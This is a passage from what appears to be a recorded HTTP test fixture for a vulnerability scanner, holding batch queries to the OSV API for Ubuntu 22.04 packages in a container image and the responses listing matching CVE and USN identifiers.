"perl" }, "version": "5.34.0-3ubuntu1.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sed" }, "version": "4.8-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sensible-utils" }, "version": "0.0.17" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sysvinit" }, "version": "3.01-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "tar" }, "version": "1.34+dfsg-1ubuntu0.1.22.04.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ubuntu-keyring" }, "version": "2021.03.26" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "usrmerge" }, "version": "25ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "zlib" }, "version": "1:1.2.11.dfsg-2ubuntu9.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Empty_Ubuntu_22.04_image_tar url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 11965 body: | { "results": [ {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-2781", "modified": "2026-03-18T06:32:17.714169Z" }, { "id": "UBUNTU-CVE-2025-5278", "modified": "2026-03-18T07:55:13.290684Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-6297", "modified": "2026-02-04T03:36:18.990840Z" }, { "id": "UBUNTU-CVE-2026-2219", "modified": "2026-03-14T09:17:58.405826Z" }, { "id": "USN-7768-1", "modified": "2026-02-10T04:49:49Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-3219", "modified": "2026-01-20T17:26:42.776809Z" }, { "id": "UBUNTU-CVE-2025-30258", "modified": "2026-02-04T04:30:17.426918Z" }, { "id": "UBUNTU-CVE-2025-68972", "modified": "2026-01-20T19:15:15.770361Z" }, { "id": "UBUNTU-CVE-2025-68973", "modified": "2026-02-05T00:30:28.335358Z" }, { "id": "USN-7412-1", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7412-2", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7946-1", "modified": "2026-02-10T04:50:47Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-1390", "modified": "2026-02-04T04:28:50.933288Z" }, { "id": "USN-7287-1", "modified": "2026-02-10T04:47:15Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-2236", "modified": "2026-01-20T17:51:42.649938Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-12243", "modified": "2026-02-04T02:53:36.843010Z" }, { "id": "UBUNTU-CVE-2025-14831", "modified": "2026-02-28T05:58:56.935176Z" }, { "id": "UBUNTU-CVE-2025-32988", "modified": "2026-02-04T02:15:37.273955Z" }, { "id": "UBUNTU-CVE-2025-32989", "modified": "2026-02-04T03:37:18.739300Z" }, { "id": "UBUNTU-CVE-2025-32990", "modified": "2026-02-04T03:31:01.615385Z" }, { "id": "UBUNTU-CVE-2025-6395", "modified": "2026-02-04T03:31:22.603031Z" }, { "id": "UBUNTU-CVE-2025-9820", "modified": "2026-02-28T06:16:45.816014Z" }, { "id": "USN-7281-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7635-1", "modified": "2026-02-10T04:49:34Z" }, { "id": "USN-8043-1", "modified": "2026-02-17T22:00:37.652199Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2025-62813", "modified": "2025-10-27T08:32:45.494712Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-41409", "modified": "2025-10-24T04:53:52Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-13176", "modified": "2026-03-09T11:29:11.736076Z" }, { "id": "UBUNTU-CVE-2024-41996", "modified": "2026-02-06T21:00:29.439853Z" }, { "id": "UBUNTU-CVE-2024-9143", "modified": "2026-03-09T11:29:50.088989Z" }, { "id": "UBUNTU-CVE-2025-15467", "modified": "2026-03-05T18:42:43.606385Z" }, { "id": "UBUNTU-CVE-2025-27587", "modified": "2026-02-06T21:55:03.879396Z" }, { "id": "UBUNTU-CVE-2025-68160", "modified": "2026-02-12T06:59:44.011039Z" }, { "id": "UBUNTU-CVE-2025-69418", "modified": "2026-02-06T22:01:44.179826Z" }, { "id": "UBUNTU-CVE-2025-69419", "modified": "2026-02-12T06:59:40.921557Z" }, { "id": "UBUNTU-CVE-2025-69420", "modified": "2026-02-12T06:58:38.833674Z" }, { "id": "UBUNTU-CVE-2025-69421", "modified": "2026-03-02T12:02:19.670699Z" }, { "id": "UBUNTU-CVE-2025-9230", "modified": "2026-03-09T12:25:45.048270Z" }, { "id": "UBUNTU-CVE-2026-22795", "modified": "2026-02-12T06:58:35.942634Z" }, { "id": "UBUNTU-CVE-2026-22796", "modified": "2026-02-12T06:59:02.005868Z" }, { "id": "UBUNTU-CVE-2026-2673", "modified": "2026-03-18T08:04:38.900604Z" }, { "id": "USN-7278-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7786-1", "modified": "2026-02-10T04:50:09Z" }, { "id": "USN-7980-1", "modified": "2026-03-02T11:56:15.392710Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2021-46848", "modified": "2026-02-12T06:44:04.921097Z" }, { "id": "UBUNTU-CVE-2024-12133", "modified": "2026-02-12T06:31:24.332995Z" }, { "id": "UBUNTU-CVE-2025-13151", "modified": "2026-02-12T06:43:59.770392Z" }, { "id": "USN-7275-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7954-1", "modified": "2026-02-10T04:50:47Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-4899", "modified": "2025-09-08T16:49:53Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-31486", "modified": "2025-10-24T05:01:58Z" }, { "id": "UBUNTU-CVE-2023-47039", "modified": "2025-10-24T05:02:19Z" }, { "id": "UBUNTU-CVE-2024-56406", "modified": "2026-02-04T02:50:55.689079Z" }, { "id": "UBUNTU-CVE-2025-40909", "modified": "2026-02-04T02:15:05.324531Z" }, { "id": "USN-7434-1", "modified": "2026-02-10T04:47:48Z" }, { "id": "USN-7678-1", "modified": "2026-02-10T04:49:41Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-45582", "modified": "2026-01-20T18:59:29.811906Z" } ] }, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2026-27171", "modified": "2026-02-27T09:59:13Z" } ] } ] } headers: Content-Length: - "11965" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14065 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:22.04", "name": "adduser" }, "version": "3.118ubuntu5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-files" }, "version": "12ubuntu4.7" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-passwd" }, "version": "3.5.52build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bash" }, "version": "5.1-6ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "1:2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "coreutils" }, "version": "8.32-4.1ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dash" }, "version": "0.5.11+git20210903+057cd650a4ed-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debconf" }, "version": "1.5.79ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debianutils" }, "version": "5.5-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "diffutils" }, "version": "1:3.8-0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dpkg" }, "version": "1.21.1ubuntu2.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "findutils" }, "version": "4.8.0-1ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnupg2" }, "version": "2.2.27-3ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "grep" }, "version": "3.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gzip" }, "version": "1.10-4ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "hostname" }, "version": "3.23ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "init-system-helpers" }, "version": "1.62" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "acl" }, "version": "2.3.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "attr" }, "version": "1:2.5.1-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bzip2" }, "version": "1.0.8-5build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap-ng" }, "version": "0.7.9-2.2build3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap2" }, "version": "1:2.44-1ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libxcrypt" }, "version": "1:4.4.27-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.8ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "cdebconf" }, "version": "0.261ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libffi" }, "version": "3.4.2-4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgcrypt20" }, "version": "1.9.4-3ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gmp" }, "version": "2:6.2.1+dfsg-3ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnutls28" }, "version": "3.7.3-4ubuntu1.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgpg-error" }, "version": "1.43-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libidn2" }, "version": "2.3.2-2build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "keyutils" }, "version": "1.6.1-2ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lz4" }, "version": "1.9.3-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xz-utils" }, "version": "5.2.5-2ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libnsl" }, "version": "1.3.0-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "p11-kit" }, "version": "0.24.0-6build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre2" }, "version": "10.39-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre3" }, "version": "2:8.39-13ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libseccomp" }, "version": "2.5.3-2ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libselinux" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsepol" }, "version": "3.3-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "openssl" }, "version": "3.0.2-0ubuntu1.18" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtasn1-6" }, "version": "4.18.0-4build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libunistring" }, "version": "1.0-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xxhash" }, "version": "0.8.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libzstd" }, "version": "1.4.8+dfsg-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lsb" }, "version": "11.1.0ubuntu4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "mawk" }, "version": "1.3.4.20200120-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "perl" }, "version": "5.34.0-3ubuntu1.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sed" }, "version": "4.8-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sensible-utils" }, "version": "0.0.17" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sysvinit" }, "version": "3.01-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "tar" }, "version": "1.34+dfsg-1ubuntu0.1.22.04.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ubuntu-keyring" }, "version": "2021.03.26" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "usrmerge" }, "version": "25ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "zlib" }, "version": "1:1.2.11.dfsg-2ubuntu9.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Empty_Ubuntu_22.04_image_tar_with_unimportant_vulns url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 11965 body: | { "results": [ {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-2781", "modified": "2026-03-18T06:32:17.714169Z" }, { "id": "UBUNTU-CVE-2025-5278", "modified": "2026-03-18T07:55:13.290684Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-6297", "modified": "2026-02-04T03:36:18.990840Z" }, { "id": "UBUNTU-CVE-2026-2219", "modified": "2026-03-14T09:17:58.405826Z" }, { "id": "USN-7768-1", "modified": "2026-02-10T04:49:49Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-3219", "modified": "2026-01-20T17:26:42.776809Z" }, { "id": "UBUNTU-CVE-2025-30258", "modified": "2026-02-04T04:30:17.426918Z" }, { "id": "UBUNTU-CVE-2025-68972", "modified": "2026-01-20T19:15:15.770361Z" }, { "id": 